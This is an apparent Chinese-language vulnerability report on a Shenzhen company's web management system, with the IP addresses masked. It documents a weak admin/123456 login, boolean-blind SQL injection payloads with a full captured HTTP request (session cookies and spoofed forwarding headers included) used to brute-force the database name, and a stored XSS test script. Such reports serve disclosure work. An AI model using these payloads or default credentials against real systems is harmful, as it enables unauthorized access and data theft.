深圳xxxxx有限公司漏洞报告
存在漏洞:弱口令,sql注入,存储型xss
1.弱口令
http://xxx.xxx.xxx.xxx:8088/
2.SQL注入
http://xxx.xxx.xxx.xxx:8088/home/main#//Order/Index
3.存储型XSS
http://xxx.xxx.xxx.xxx:8088/home/main#//PrintDevice/Index
弱口令
admin
123456
成功来到管理系统
SQL注入
选择订单管理
测试注入’ ‘’
' and 0='1
' and 1='1
使用布尔盲注
测试出数据库长度为16
' and if(length(database())=16,1,0)='1
测试数据库第一位为d
' and if(mid(database(),1,1)='d',1,0)='1
后续使用bp进行爆破
GET /Order/GetOrderList?page=1&limit=15&addon=&orderInfo=%27+and+if(mid(database()%2C1%2C1)%3D%27d%27%2C1%2C0)%3D%271&orderStatus= HTTP/1.1
Host: xxx.xxx.xxx.xxx:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://xxx.xxx.xxx.xxx:8088/Order/Index
Cookie: .AspNetCore.Session=CfDJ8AQHohFLrupNnfYlr4WRS3YXBsxAsGl9lIouBEENxjbbE3be%2Bu2yfb6cGNwXD4C9v7UDxCcjSv0ZwW5BJbofLoa3cQshDWE8BQpp0KU935V7lWLMeV5jwbumgRNVlX6l5mlDmYZnvQTRJeJmPinEG8GlM33qawzWaCTiPYK1IDv4; .AspNetCore.Cookies=CfDJ8AQHohFLrupNnfYlr4WRS3abqqskD-4pyPjtNH1Mb4BeaN-b0yBzqBcSlNoy51WGYGFzP_6Oi_PTknRJlSxcMCug3Hacljoofu3FcUVF2FV51tk8gc90xmiPMmS979cYM9yGi9dNagIrmRwonC1UxTtKus4YhIY1KcAm0y6JGesJ1BJWI2I1zyqzUiEZo8eH1HQ7oL-2hUHJ0_sa8t_64g94FrlKFbNlGYqO2NFPL0cmR2KYoCvfiZVOjOG72hLwElOlg9GHuV-k0LBsnM3txBhGOkTkpaBpzOr11ISR3MdDo0rmQ31rc7ggrJ2CmNyYCnQXxVAuRgePFdIIemhsG8Pn5VQkJSIAdQQOjTz8eU0qCSoior9Vfl1Jn9o-KcFWexAAIPteKK7z7eWdylDvI4bEVpnT043ulEmjkFH5qKtpz_5PMItz53CjohfbMUPIya4IOzBehSbm2exVbNkGyuOLJ_WYDsk1BgQKjpBDHfYH8tuFuB0E2UpUtmj6fHJNUONUhUjt__gBWKoi2DtRcD0
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
爆破参数:orderInfo
成功爆破出库名:dbprintproject
存储型XSS
来到设备管理,进行添加
测试<script>alert(1)</script>